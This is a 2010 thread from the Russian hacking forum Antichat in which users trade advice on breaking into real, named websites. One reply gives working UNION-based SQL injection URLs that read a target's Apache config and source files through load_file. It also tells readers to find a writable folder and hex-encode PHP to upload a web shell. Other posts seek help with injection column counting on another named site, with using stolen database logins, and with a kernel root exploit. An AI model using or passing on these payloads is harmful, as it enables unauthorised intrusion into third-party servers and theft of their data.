Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

12.04.2010, 20:39
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме: 52122
Репутация:
-6
|
|
а какой тогда правельный?.. ато я уже многие пути испробовал
|
|
|

12.04.2010, 20:50
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
Есть логин и пароль и именя баз данных но немогу найти phpMyAdmin!!! Подскажите хорошую прогу для удаленного редактирования...
|
|
|

12.04.2010, 20:52
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
GOGA075 http://scan.xaknet.ru:8080/action/scan
и не факт что есть phpmyadmin
|
|
|

12.04.2010, 20:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
2papst ищи в конфигах пути /etc/httpd/conf/httpd.conf например
|
|
|

12.04.2010, 21:09
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от papst
а какой тогда правельный?.. ато я уже многие пути испробовал
правильный или нет путь проверяется путем попытки прочитать какую-то страницу сайта:
Код:
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/home/sites/mindviz/httpd/gift.php'),8,9,10,11,12,13,14,15,16,17--+
Путь взят отсюда:
Код:
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/usr/local/apache/conf/httpd.conf'),8,9,10,11,12,13,14,15,16,17--+
DocumentRoot /home/sites/mindviz/httpd <------
Чтобы залить шелл, надо найти папку, доступную на запись, php-код лучше хексить, а не писать в чистом виде
|
|
|

12.04.2010, 21:53
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме: 698831
Репутация:
34
|
|
есть шанс порутить ядро Fri Dec 4 08:40:11 EET 2009 ?!
этот сплоент был до обновы ядра выпущен 
|
|
|

12.04.2010, 23:31
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме: 789539
Репутация:
53
|
|
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку
PHP код:
Ошибка запроса: 'select name,parentid from kn_tree where id=1 union all select 1'
а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1, 2
то ошибка уже
PHP код:
Ошибка запроса: 'select typeid from kn_tree where id=1 union all select 1,2'
что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...
|
|
|

12.04.2010, 23:48
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
Подскажите хороший perl интерпретатор для сплоита.
Последний раз редактировалось GOGA075; 12.04.2010 в 23:50..
|
|
|

12.04.2010, 23:59
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
|
|
|

13.04.2010, 00:03
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
Gorev, благодарю!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|